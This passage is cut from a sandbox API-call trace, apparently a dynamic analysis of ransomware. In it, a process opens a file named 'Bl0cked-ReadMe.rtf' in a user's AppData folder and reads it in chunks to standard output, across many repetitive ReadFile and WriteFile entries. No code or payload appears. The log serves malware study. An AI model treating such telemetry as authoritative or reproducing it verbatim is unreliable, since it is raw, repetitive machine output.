(lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0140.974] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1edfb0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0140.974] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0140.974] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.974] GetFileType (hFile=0x54) returned 0x1 [0140.974] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.974] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x1ee008 | out: lpFileSizeHigh=0x1ee008*=0x0) returned 0x1632 [0140.974] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.974] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.974] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.975] ReadFile (in: hFile=0x54, lpBuffer=0x1eee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee030, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesRead=0x1ee030*=0x200, lpOverlapped=0x0) returned 1 [0140.975] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.975] GetFileType (hFile=0x4c) returned 0x1 [0140.975] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.975] GetFileType (hFile=0x4c) returned 0x1 [0140.975] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.975] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.976] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.976] GetFileType (hFile=0x4c) returned 0x1 [0140.976] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.976] WriteFile (in: 
hFile=0x4c, lpBuffer=0x1eee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee90*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.977] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.977] GetFileType (hFile=0x4c) returned 0x1 [0140.977] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.977] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eeee0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.977] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.977] GetFileType (hFile=0x4c) returned 0x1 [0140.977] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.977] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef30*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.977] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.977] GetFileType (hFile=0x4c) returned 0x1 [0140.977] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.977] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef80*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.977] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.977] GetFileType (hFile=0x4c) returned 0x1 [0140.977] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.977] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eefd0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.977] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.977] GetFileType (hFile=0x4c) returned 0x1 [0140.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.978] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef020*, 
nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1ef020*, lpNumberOfBytesWritten=0x1ee024*=0x20, lpOverlapped=0x0) returned 1 [0140.978] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.978] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee010 | out: lpNewFilePointer=0x0) returned 1 [0140.978] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.978] ReadFile (in: hFile=0x54, lpBuffer=0x1eee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee030, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesRead=0x1ee030*=0x200, lpOverlapped=0x0) returned 1 [0140.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.978] GetFileType (hFile=0x4c) returned 0x1 [0140.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.978] GetFileType (hFile=0x4c) returned 0x1 [0140.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.978] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.978] GetFileType (hFile=0x4c) returned 0x1 [0140.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.978] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee90*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.978] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.978] GetFileType (hFile=0x4c) returned 0x1 [0140.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.979] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eeee0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.979] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0140.979] GetFileType (hFile=0x4c) returned 0x1 [0140.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.979] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef30*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.979] GetFileType (hFile=0x4c) returned 0x1 [0140.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.979] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef80*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.979] GetFileType (hFile=0x4c) returned 0x1 [0140.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.979] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eefd0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.979] GetFileType (hFile=0x4c) returned 0x1 [0140.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.980] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1ef020*, lpNumberOfBytesWritten=0x1ee024*=0x20, lpOverlapped=0x0) returned 1 [0140.980] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.980] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee010 | out: lpNewFilePointer=0x0) returned 1 [0140.980] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.980] ReadFile (in: hFile=0x54, lpBuffer=0x1eee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee030, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesRead=0x1ee030*=0x200, lpOverlapped=0x0) returned 1 
[0140.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.980] GetFileType (hFile=0x4c) returned 0x1 [0140.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.980] GetFileType (hFile=0x4c) returned 0x1 [0140.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.980] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.980] GetFileType (hFile=0x4c) returned 0x1 [0140.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.980] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee90*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.980] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.981] GetFileType (hFile=0x4c) returned 0x1 [0140.981] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.981] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eeee0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.983] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.984] GetFileType (hFile=0x4c) returned 0x1 [0140.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.984] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef30*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.984] GetFileType (hFile=0x4c) returned 0x1 [0140.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.984] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef80*, 
lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.984] GetFileType (hFile=0x4c) returned 0x1 [0140.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.984] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eefd0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.984] GetFileType (hFile=0x4c) returned 0x1 [0140.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.984] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1ef020*, lpNumberOfBytesWritten=0x1ee024*=0x20, lpOverlapped=0x0) returned 1 [0140.984] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.984] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee010 | out: lpNewFilePointer=0x0) returned 1 [0140.984] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.984] ReadFile (in: hFile=0x54, lpBuffer=0x1eee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee030, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesRead=0x1ee030*=0x200, lpOverlapped=0x0) returned 1 [0140.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.984] GetFileType (hFile=0x4c) returned 0x1 [0140.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.984] GetFileType (hFile=0x4c) returned 0x1 [0140.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.985] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.985] GetFileType (hFile=0x4c) returned 0x1 [0140.985] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0140.985] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee90*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.985] GetFileType (hFile=0x4c) returned 0x1 [0140.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.985] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eeee0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.985] GetFileType (hFile=0x4c) returned 0x1 [0140.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.985] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef30*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.985] GetFileType (hFile=0x4c) returned 0x1 [0140.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.985] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef80*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.985] GetFileType (hFile=0x4c) returned 0x1 [0140.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.985] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eefd0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.985] GetFileType (hFile=0x4c) returned 0x1 [0140.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.986] WriteFile (in: hFile=0x4c, 
lpBuffer=0x1ef020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1ef020*, lpNumberOfBytesWritten=0x1ee024*=0x20, lpOverlapped=0x0) returned 1 [0140.986] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.986] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee010 | out: lpNewFilePointer=0x0) returned 1 [0140.986] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.986] ReadFile (in: hFile=0x54, lpBuffer=0x1eee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee030, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesRead=0x1ee030*=0x200, lpOverlapped=0x0) returned 1 [0140.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.986] GetFileType (hFile=0x4c) returned 0x1 [0140.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.986] GetFileType (hFile=0x4c) returned 0x1 [0140.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.986] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.986] GetFileType (hFile=0x4c) returned 0x1 [0140.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.986] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee90*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.986] GetFileType (hFile=0x4c) returned 0x1 [0140.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.986] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eeee0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.986] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0140.986] GetFileType (hFile=0x4c) returned 0x1 [0140.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.986] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef30*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.987] GetFileType (hFile=0x4c) returned 0x1 [0140.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.987] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef80*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.987] GetFileType (hFile=0x4c) returned 0x1 [0140.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.987] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eefd0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.987] GetFileType (hFile=0x4c) returned 0x1 [0140.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.987] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1ef020*, lpNumberOfBytesWritten=0x1ee024*=0x20, lpOverlapped=0x0) returned 1 [0140.987] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.987] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee010 | out: lpNewFilePointer=0x0) returned 1 [0140.987] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.987] ReadFile (in: hFile=0x54, lpBuffer=0x1eee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee030, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesRead=0x1ee030*=0x200, 
lpOverlapped=0x0) returned 1 [0140.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.987] GetFileType (hFile=0x4c) returned 0x1 [0140.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.987] GetFileType (hFile=0x4c) returned 0x1 [0140.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.987] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.987] GetFileType (hFile=0x4c) returned 0x1 [0140.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.988] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee90*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.988] GetFileType (hFile=0x4c) returned 0x1 [0140.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.988] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eeee0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.988] GetFileType (hFile=0x4c) returned 0x1 [0140.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.988] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef30*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.988] GetFileType (hFile=0x4c) returned 0x1 [0140.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.988] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 
| out: lpBuffer=0x1eef80*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.988] GetFileType (hFile=0x4c) returned 0x1 [0140.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.988] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eefd0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.988] GetFileType (hFile=0x4c) returned 0x1 [0140.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.988] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1ef020*, lpNumberOfBytesWritten=0x1ee024*=0x20, lpOverlapped=0x0) returned 1 [0140.988] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.989] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee010 | out: lpNewFilePointer=0x0) returned 1 [0140.989] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.989] ReadFile (in: hFile=0x54, lpBuffer=0x1eee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee030, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesRead=0x1ee030*=0x200, lpOverlapped=0x0) returned 1 [0140.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.989] GetFileType (hFile=0x4c) returned 0x1 [0140.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.989] GetFileType (hFile=0x4c) returned 0x1 [0140.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.989] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.989] GetFileType (hFile=0x4c) returned 0x1 [0140.989] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0140.989] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee90*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.989] GetFileType (hFile=0x4c) returned 0x1 [0140.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.989] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eeee0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.989] GetFileType (hFile=0x4c) returned 0x1 [0140.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.989] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef30*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.989] GetFileType (hFile=0x4c) returned 0x1 [0140.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.989] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef80*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.990] GetFileType (hFile=0x4c) returned 0x1 [0140.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.990] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eefd0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.990] GetFileType (hFile=0x4c) returned 0x1 [0140.990] _get_osfhandle (_FileHandle=1) returned 0x4c 
